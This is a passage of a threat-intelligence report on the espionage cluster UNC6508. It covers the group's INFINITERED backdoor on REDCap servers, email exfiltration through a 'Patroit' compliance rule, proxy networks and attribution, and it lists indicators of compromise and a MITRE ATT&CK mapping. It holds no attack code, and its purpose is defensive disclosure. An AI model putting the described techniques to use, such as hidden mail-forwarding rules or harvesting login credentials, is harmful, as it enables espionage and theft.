        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Targeted intelligence collection categories" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/inifinitered-fig3.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 3: Targeted intelligence collection categories&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The patterns used in the “Patroit” compliance rule suggest strategic intelligence collection targeting geo-strategic policy, military strategy, advanced technology, and medical research. The patterns also include professional email addresses and phone numbers for members of organizations in these spaces. Several of the terms applied have spelling errors, suggesting the list was manually maintained. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This ambitious scope of intelligence collection from UNC6508 may suggest a broader range of targets beyond the identified victims in the medical research community. GTIG assesses these collection priorities are aligned with the strategic interests of the People's Republic of China. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While most of the terms relate to defense and technology, the terms including medical research facilities, and the specific pathogen “Chikungunya,” stand out from the others. Chikungunya is a viral disease transmitted to humans from mosquitos and was responsible for an &lt;/span&gt;&lt;a href="https://www.unmc.edu/healthsecurity/transmission/2025/09/30/explosive-chikungunya-virus-outbreak-in-china/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;outbreak in China's Guangdong province&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; beginning in July 2025.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Operations Security (OpSec)&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG observed UNC6508 use sophisticated and meticulous OpSec techniques to conceal their activities from defenders. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="UNC6508 operations security techniques" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/inifinitered-fig4.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 4: UNC6508 operations security techniques&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;UNC6508 relied heavily on Obfuscation (OBF) networks. This strategy, now frequently employed by PRC-nexus actors, involves routing traffic from offensive operations through a mix of compromised routers, residential proxies, Virtual Private Servers (VPS), and other devices.  &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This operation used exclusively US-based OBF network IP addresses to access both the "&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;BebitaBarefoot774[@]gmail[.]com&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;" account and when replaying legitimate credentials to access the compromised enterprise administrator account. Additional OpSec techniques were also used, such as obtaining the threat actor-controlled Gmail account through a mass creation service and dedicating it exclusively to email data exfiltration.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By maintaining a high level of OpSec, UNC6508 significantly complicates the efforts of defenders to identify malicious patterns, establish accurate attribution, and map the threat actor’s infrastructure.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Attribution&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG attributes this activity to UNC6508 with high confidence. This assessment is based on infrastructure overlaps between campaigns, the consistent use of the INFINITERED backdoor on REDCap servers, and the specific targeting of medical research and defense sectors. We assess UNC6508 is an espionage motivated threat cluster, with priorities that align with historic PRC state-sponsored espionage trends and intelligence collection requirements.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Indicators of Compromise (IOCs)&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To assist the wider community, we have also included a list of indicators in a &lt;a href="https://www.virustotal.com/gui/collection/f3a266bed2b73690459e30a2e52e5afd4bc36ea83197ab8bf3d5cb17095a7eef" rel="noopener" target="_blank"&gt;GTI Collection&lt;/a&gt; for registered users.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Network Indicators&lt;/span&gt;&lt;/h4&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Indicator&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Type&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Context&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;BebitaBarefoot774@gmail.com&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Email&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Email exfiltration account&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;23.169.65.49&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IP&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Source of admin login (Compromised ASUS router)&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;File Indicators&lt;/span&gt;&lt;/h4&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Persistence (help.php)&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;ba6b73b0ca0dc7f86b3b397893ac32d729fd53f9df20643288f141f29d020af7&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Credential Harvester &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;db65c1b9f9e4cb4d729f45ad4b6fcf3e277caf9eb4c875425dec93fd883f9136&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Credential Harvester &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;c1ac43d23f89d41eb4ff131678ab562ab2cfed9aa334b13767ef141d303b0e5b&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Backdoor &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;8f0158855a656b629ca76ebca565f18bc25563ded34b65d6771632c20edb68ec&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Backdoor &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;51a57bfc9ed3eb6451c1c289607814d59e1698c666fb97ac5f694c398f23d045&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Dropper &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;4efbef69eb3b09bacff892d6a55778d07c418e7f15eba3cf1245e8cdfd8dda0b&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Dropper &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;58bb25777e0aa86bcd2125101e0bca4e8732b03d91bd8d2f205b446a2a8d5c86&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Host Indicators&lt;/span&gt;&lt;/h4&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Indicator&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;b49e334d-9c01-463e-9bc5-00a6920fb66e&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;INFINITERED current software version GUID delimiter&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;xc32038474a&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;INFINITERED Redcap database session ID prefix&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;MITRE ATT&amp;amp;CK Mapping&lt;/strong&gt;&lt;/h3&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Tactic&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Technique ID&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Technique Name&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Context/Activity&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Initial Access&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1190&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Exploit Public-Facing Application&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Exploitation of REDCap survey management servers.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Persistence&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1505.003&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Server Software Component: Web Shell&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Deployment of INFINITERED and uploaders.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt; &lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1554&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Compromise Client Software Binary&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Modification of REDCap to intercept updates.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Defense Evasion&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1027&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Obfuscated Files or Information&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Use of Base64 encoding for malicious payloads within PHP files.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt; &lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1090.003&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Proxy: Multi-hop Proxy&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Routing traffic through compromised IoT devices (OBF networks).&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt; &lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1562.001&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Impair Defenses: Disable or Modify Tools&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Creating "silent" BCC rules to avoid user detection.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt; &lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1689&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Downgrade Attack&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Exploiting vulnerable legacy versions of REDCap.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Credential Access&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1555&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Credentials from Password Stores&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Accessing local configuration files. &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt; &lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1056.003&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Input Capture: Web Portal Capture&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;INFINITERED harvesting plaintext credentials from POST login requests.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Collection&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1114.003&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Email Collection: Email Forwarding Rule&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Use of content compliance rules ("Patroit") for automated exfiltration.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt; &lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1213&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Data from Information Repositories&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Searching storage and email for strategic keywords.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Command and Control&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1071.001&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Application Layer Protocol: Web Protocols&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;C2 communication via HTTP Cookie parameters (REDCAP-TOKEN).&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
